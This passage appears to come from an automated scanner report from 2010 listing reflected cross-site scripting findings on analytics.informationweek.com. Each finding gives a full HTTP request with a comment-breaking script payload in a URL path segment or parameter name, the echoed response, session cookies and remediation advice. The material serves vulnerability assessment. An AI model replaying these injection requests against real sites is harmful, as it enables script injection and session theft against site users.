Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/83ef59f--><script>alert(1)</script>55ce15d0e/It-business-strategy/It-business-strategy.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:18 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:18 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45943
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... menu%2F83ef59f--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E55ce15d0e%2FIt-business-strategy%2FIt-business-strategy.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/83ef59f--><script>alert(1)</script>55ce15d0e/It-business-strategy/It-business-strategy.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 15d71--><script>alert(1)</script>c826d261e72 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/83/It-business-strategy15d71--><script>alert(1)</script>c826d261e72/It-business-strategy.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:33 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:33 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45947
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... -strategy15d71--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ec826d261e72%2FIt-business-strategy.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/83/It-business-strategy15d71--><script>alert(1)</script>c826d261e72/It-business-strategy.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 35fd4--><script>alert(1)</script>a2a7431dc34 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/83/It-business-strategy/It-business-strategy.html35fd4--><script>alert(1)</script>a2a7431dc34 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:42 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:42 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45947
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... rategy.html35fd4--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ea2a7431dc34&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/83/It-business-strategy/It-business-strategy.html35fd4--><script>alert(1)</script>a2a7431dc34"> ...[SNIP]...
3.150. http://analytics.informationweek.com/menu/83/It-business-strategy/It-business-strategy.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload c61e7--><script>alert(1)</script>63f78dfcec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/83/It-business-strategy/It-business-strategy.html?c61e7--><script>alert(1)</script>63f78dfcec=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... html%3Fc61e7--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E63f78dfcec%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/83/It-business-strategy/It-business-strategy.html?c61e7--><script>alert(1)</script>63f78dfcec=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 188e8--><script>alert(1)</script>80b08b924c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu188e8--><script>alert(1)</script>80b08b924c4/9/Ip-telephony-and-unified-communications/Ip-telephony-unified-communications.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:05 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:05 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 46013
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 281%29%3C%2Fscript%3E80b08b924c4%2F9%2FIp-telephony-and-unified-communications%2FIp-telephony-unified-communications.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu188e8--><script>alert(1)</script>80b08b924c4/9/Ip-telephony-and-unified-communications/Ip-telephony-unified-communications.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 9fa85--><script>alert(1)</script>58bbe578fd8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/99fa85--><script>alert(1)</script>58bbe578fd8/Ip-telephony-and-unified-communications/Ip-telephony-unified-communications.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:16 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:16 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 46013
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... t%281%29%3C%2Fscript%3E58bbe578fd8%2FIp-telephony-and-unified-communications%2FIp-telephony-unified-communications.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/99fa85--><script>alert(1)</script>58bbe578fd8/Ip-telephony-and-unified-communications/Ip-telephony-unified-communications.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload ab4da--><script>alert(1)</script>4ac269aa3be was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/9/Ip-telephony-and-unified-communicationsab4da--><script>alert(1)</script>4ac269aa3be/Ip-telephony-unified-communications.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:31 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:31 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 46013
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ert%281%29%3C%2Fscript%3E4ac269aa3be%2FIp-telephony-unified-communications.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/9/Ip-telephony-and-unified-communicationsab4da--><script>alert(1)</script>4ac269aa3be/Ip-telephony-unified-communications.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 7cc6f--><script>alert(1)</script>0701dc420db was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/9/Ip-telephony-and-unified-communications/Ip-telephony-unified-communications.html7cc6f--><script>alert(1)</script>0701dc420db HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:46 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:46 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 46013
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... alert%281%29%3C%2Fscript%3E0701dc420db&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/9/Ip-telephony-and-unified-communications/Ip-telephony-unified-communications.html7cc6f--><script>alert(1)</script>0701dc420db"> ...[SNIP]...
3.155. http://analytics.informationweek.com/menu/9/Ip-telephony-and-unified-communications/Ip-telephony-unified-communications.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 363e9--><script>alert(1)</script>f02ab6e7b3c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/9/Ip-telephony-and-unified-communications/Ip-telephony-unified-communications.html?363e9--><script>alert(1)</script>f02ab6e7b3c=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... %281%29%3C%2Fscript%3Ef02ab6e7b3c%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/9/Ip-telephony-and-unified-communications/Ip-telephony-unified-communications.html?363e9--><script>alert(1)</script>f02ab6e7b3c=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload a1e0a--><script>alert(1)</script>12e4c7ebdff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /offera1e0a--><script>alert(1)</script>12e4c7ebdff HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:39:19 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:39:19 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45843
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... n?service=http%3A%2F%2Fanalytics.informationweek.com%2Foffera1e0a--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E12e4c7ebdff&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/offera1e0a--><script>alert(1)</script>12e4c7ebdff"> ...[SNIP]...
3.157. http://analytics.informationweek.com/offer [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://analytics.informationweek.com
Path: /offer
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a0787--><script>alert(1)</script>483669447d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /offer?a0787--><script>alert(1)</script>483669447d=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ce=http%3A%2F%2Fanalytics.informationweek.com%2Foffer%3Fa0787--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E483669447d%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/offer?a0787--><script>alert(1)</script>483669447d=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 5b3b7--><script>alert(1)</script>d925b8418cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /profile5b3b7--><script>alert(1)</script>d925b8418cb/registration-step1.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:39:26 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:39:26 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45897
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... cs.informationweek.com%2Fprofile5b3b7--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed925b8418cb%2Fregistration-step1.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/profile5b3b7--><script>alert(1)</script>d925b8418cb/registration-step1.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload cb96a--><script>alert(1)</script>fac2d3fc4b6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /profile/registration-step1.htmlcb96a--><script>alert(1)</script>fac2d3fc4b6 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:39:39 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 45897
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... Fprofile%2Fregistration-step1.htmlcb96a--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Efac2d3fc4b6&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/profile/registration-step1.htmlcb96a--><script>alert(1)</script>fac2d3fc4b6"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload a0173--><script>alert(1)</script>4574200b934 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /researcha0173--><script>alert(1)</script>4574200b934 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:41:25 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:25 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45849
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ice=http%3A%2F%2Fanalytics.informationweek.com%2Fresearcha0173--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4574200b934&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/researcha0173--><script>alert(1)</script>4574200b934"> ...[SNIP]...
3.161. http://analytics.informationweek.com/research [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://analytics.informationweek.com
Path: /research
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 14849--><script>alert(1)</script>f31515ac1f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /research?14849--><script>alert(1)</script>f31515ac1f5=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
